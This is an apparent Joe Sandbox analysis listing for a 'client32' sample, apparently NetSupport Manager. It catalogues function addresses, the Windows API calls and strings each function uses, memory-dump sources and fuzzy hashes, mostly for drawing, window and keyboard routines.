                                                                                                                                      • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                                    • GetSaveFileNameA.COMDLG32(00000058,?,?,?,20F29797), ref: 110024A4
                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 11002518
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 11002522
                                                                                                                                    • DeleteObject.GDI32(?), ref: 1100252F
                                                                                                                                    • DeleteDC.GDI32(?), ref: 11002536
                                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 1100255F
                                                                                                                                    • RevertToSelf.ADVAPI32(?,?,?,20F29797), ref: 11002561
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ObjectProcess$CloseCompatibleCreateDeleteEnableFileFolderHandleNameOpenPathSelect$BitmapFindImpersonateLoggedModuleRevertSaveSelfThreadTokenUserVersion
                                                                                                                                    • String ID: BMP$X$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 3218626338-2539113696
                                                                                                                                    • Opcode ID: 707966891ba89dca208264028aa69297b782c98c3fb71acf7aedca3f39ebb5e9
                                                                                                                                    • Instruction ID: 9d3051af6559d4f2dd0c7a1e2ead35f12597f10354149e4796aa47e8d90882b9
                                                                                                                                    • Opcode Fuzzy Hash: 707966891ba89dca208264028aa69297b782c98c3fb71acf7aedca3f39ebb5e9
                                                                                                                                    • Instruction Fuzzy Hash: 4D51A175E40319AFEB24CF60CC85FEAB7B8FB49748F0045A9E529A7680DB74A940CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11018460 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 151COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,762DC740), ref: 11145CA0
                                                                                                                                      • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                                      • Part of subcall function 110183B0: GetSystemMetrics.USER32 ref: 110183BF
                                                                                                                                      • Part of subcall function 110183B0: GetSystemMetrics.USER32 ref: 110183DF
                                                                                                                                    • FindWindowA.USER32 ref: 110184C1
                                                                                                                                    • GetWindowRect.USER32 ref: 110184D9
                                                                                                                                    • GetWindowLongA.USER32 ref: 11018511
                                                                                                                                    • GetWindowLongA.USER32 ref: 11018518
                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000104,?,?,?,00000104), ref: 110185B8
                                                                                                                                    • wsprintfA.USER32 ref: 11018608
                                                                                                                                    Strings
                                                                                                                                    • c:\program files\common files\microsoft shared\ink\tabtip.exe, xrefs: 110185C5
                                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TabTip.exe, xrefs: 11018551
                                                                                                                                    • IsA(), xrefs: 11018588
                                                                                                                                    • OpenKbd. No touch kbd, xrefs: 1101865D
                                                                                                                                    • open, xrefs: 11018634
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11018583
                                                                                                                                    • IPTip_Main_Window, xrefs: 110184BC
                                                                                                                                    • OpenKbd keyrect(L=%d, T=%d, R=%d, B=%d), xrefs: 110184FB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$LongMetricsSystem$EnvironmentExpandFindOpenRectStringsVersionwsprintf
                                                                                                                                    • String ID: IPTip_Main_Window$IsA()$OpenKbd keyrect(L=%d, T=%d, R=%d, B=%d)$OpenKbd. No touch kbd$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TabTip.exe$c:\program files\common files\microsoft shared\ink\tabtip.exe$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$open
                                                                                                                                    • API String ID: 3602392020-1061909023
                                                                                                                                    • Opcode ID: 15256178f2c473d2d334685a5e7146fba412686c222059a35c988bc5f98f3eed
                                                                                                                                    • Instruction ID: 32505dac5387f753d5f4a5d6101e8c76b8228c83072960b34001c442d9572215
                                                                                                                                    • Opcode Fuzzy Hash: 15256178f2c473d2d334685a5e7146fba412686c222059a35c988bc5f98f3eed
                                                                                                                                    • Instruction Fuzzy Hash: FB51CF75D0122DABDB10DB64CD85FEEB7B4EB05714F1002D5E9296B2C4EB74AB40CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110CB450 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 117registryclipboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(111F3420,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
                                                                                                                                    • RegisterClipboardFormatA.USER32 ref: 110CB46F
                                                                                                                                    • RegisterClipboardFormatA.USER32 ref: 110CB47B
                                                                                                                                    • GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
                                                                                                                                    • LoadCursorA.USER32 ref: 110CB4D1
                                                                                                                                    • RegisterClassExA.USER32(?), ref: 110CB4F2
                                                                                                                                    • GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
                                                                                                                                    • LoadCursorA.USER32 ref: 110CB56B
                                                                                                                                    • RegisterClassExA.USER32(?), ref: 110CB58C
                                                                                                                                    • LeaveCriticalSection.KERNEL32(111F3420,0000000E), ref: 110CB5B5
                                                                                                                                    • LeaveCriticalSection.KERNEL32(111F3420,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter
                                                                                                                                    • String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                                                    • API String ID: 2710552763-1587594278
                                                                                                                                    • Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                                                                    • Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
                                                                                                                                    • Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                                                                    • Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11002880 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 219COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 110028BC
                                                                                                                                    • ReleaseDC.USER32 ref: 110028E9
                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 11002975
                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 110029A5
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 110029D7
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    • GetDC.USER32(00000000), ref: 11002A05
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11002A1F
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 11002A31
                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 11002A46
                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 11002A57
                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 11002AC6
                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 11002AD7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MoveObjectSelect$Line$ErrorExitLastMessageProcessReleasewsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 901346731-2830328467
                                                                                                                                    • Opcode ID: b8309455feb2764ced8d7c4984e00add24a89697b82482a1b3c27b885bf7706d
                                                                                                                                    • Instruction ID: a53e60361ca9f8e1ddec1ea8b6ef60c725d96ee5a613c582461dddc916ee5901
                                                                                                                                    • Opcode Fuzzy Hash: b8309455feb2764ced8d7c4984e00add24a89697b82482a1b3c27b885bf7706d
                                                                                                                                    • Instruction Fuzzy Hash: 139109B5600B459FD364CF69D988BD7B7E9FB88319F10492DE5AA87310DB30B881CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11004480 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 160windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 110044B4
                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 110044E3
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110044F2
                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 11004526
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11004531
                                                                                                                                    • SelectObject.GDI32(00000000), ref: 1100454C
                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 11004580
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1100458B
                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 11004592
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 110045A3
                                                                                                                                    • InvalidateRect.USER32(00000000,?,00000000), ref: 1100461F
                                                                                                                                    • InvalidateRect.USER32(00000000,00000000,00000000), ref: 11004650
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Select$CompatibleCreateDeleteInvalidateRect$Bitmap
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 2105970896-2830328467
                                                                                                                                    • Opcode ID: 44e2563ee580fda99f72b7f2e742394cd111089d0a70a0d9a687529fd03971b7
                                                                                                                                    • Instruction ID: eb1414bd8fd2e4592000e36fc3863a3a49f4a7efc2cb9f7a10422fdc8de4f52e
                                                                                                                                    • Opcode Fuzzy Hash: 44e2563ee580fda99f72b7f2e742394cd111089d0a70a0d9a687529fd03971b7
                                                                                                                                    • Instruction Fuzzy Hash: 065147B5A40B059FD729CF68C885BBBB7F9FB88304F51456CE5AAD3244D770B8418B50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11004670 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 158windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 11004696
                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 110046C5
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110046D4
                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 11004708
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11004713
                                                                                                                                    • SelectObject.GDI32(00000000), ref: 1100472E
                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 11004762
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1100476D
                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 11004774
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 11004785
                                                                                                                                    • InvalidateRect.USER32(00000000,?,00000000), ref: 1100480D
                                                                                                                                    • InvalidateRect.USER32(00000000,00000000,00000000), ref: 1100483E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Select$CompatibleCreateDeleteInvalidateRect$Bitmap
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 2105970896-2830328467
                                                                                                                                    • Opcode ID: 07b0e8ab4cb0965a99231c7aede8338b198f0b3d66306be4641f3ab29db112dc
                                                                                                                                    • Instruction ID: 36a692b57ef39b06e6f45b46f7478629122a6d466ff518be6ac3c34ba661c029
                                                                                                                                    • Opcode Fuzzy Hash: 07b0e8ab4cb0965a99231c7aede8338b198f0b3d66306be4641f3ab29db112dc
                                                                                                                                    • Instruction Fuzzy Hash: 7E514AB5A40704AFD725CF68C885BBBB7F9FB88344F11456CE5AA93244D774B841CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110061F0 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 358COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ReleaseDC.USER32 ref: 11006267
                                                                                                                                    • InflateRect.USER32(?,?,?), ref: 11006306
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 1100632D
                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 110063D5
                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 11006410
                                                                                                                                    • Polygon.GDI32(?,?,00000003), ref: 110064C8
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 110064DC
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 110064E6
                                                                                                                                    • InflateRect.USER32(?,?,?), ref: 11006522
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 1100633D
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    • GetDC.USER32(00000000), ref: 11006569
                                                                                                                                      • Part of subcall function 11002620: SetROP2.GDI32(?,00000007), ref: 11002631
                                                                                                                                      • Part of subcall function 11002620: SelectObject.GDI32(?,?), ref: 11002642
                                                                                                                                      • Part of subcall function 11002620: MoveToEx.GDI32(?,?,?,00000000), ref: 110026AF
                                                                                                                                      • Part of subcall function 11002620: LineTo.GDI32(?,00000000,?), ref: 110026E6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ObjectSelect$InflateLineMoveRect$ErrorExitLastMessagePolygonProcessReleasewsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 2031909616-2830328467
                                                                                                                                    • Opcode ID: f40b548af5a3b969317c6371caf9fc461ff3c483ba902ae5864a027bb338f110
                                                                                                                                    • Instruction ID: 40ef36492cbbdd63dd1a1365ef49c9bea88dfca2d0282d7a726c9572eb38d0e4
                                                                                                                                    • Opcode Fuzzy Hash: f40b548af5a3b969317c6371caf9fc461ff3c483ba902ae5864a027bb338f110
                                                                                                                                    • Instruction Fuzzy Hash: 75E14BB4E00B09DBCB14DFA9D984ADEFBF8FF48308F104529D46AA7254DB31A965CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110066A0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 283COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ReleaseDC.USER32 ref: 11006731
                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 11006798
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 110067AF
                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 110067C7
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 110067DF
                                                                                                                                    • Rectangle.GDI32(?,?,?,?,?), ref: 11006825
                                                                                                                                    • Ellipse.GDI32(?,?,?,?,?), ref: 1100685D
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 1100686B
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 11006875
                                                                                                                                    • InvalidateRect.USER32(00000000,?,00000001), ref: 1100689B
                                                                                                                                    • GetDC.USER32(00000000), ref: 110068D5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
